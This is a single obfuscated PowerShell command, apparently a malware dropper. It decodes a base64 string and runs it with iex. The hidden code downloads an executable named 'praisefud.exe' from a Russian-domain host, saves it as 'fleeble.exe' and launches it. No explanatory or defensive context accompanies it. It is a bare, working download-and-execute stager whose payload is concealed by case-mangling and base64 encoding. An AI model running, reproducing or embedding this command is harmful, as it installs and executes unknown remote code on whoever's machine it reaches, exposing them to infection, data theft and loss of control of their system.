iex([sySTeM.TExT.ENcODIng]::UTF8.GEtSTRING([sYstEM.CONVeRt]::FRombase64sTrING('CihOZXctT2JqZWN0IFN5U1RlTS5ORVQud2ViQ2xpRU5UKS5Eb3dubG9BRGZpTGUoJ2h0dHA6Ly90b3hpY3NvbHV0aW9ucy5ydS91cGxvYWQvcHJhaXNlZnVkLmV4ZScsJ2ZsZWVibGUuZXhlJyk7U3RhcnQtUHJvY2VzcyAnZmxlZWJsZS5leGUnCgo=')));exit
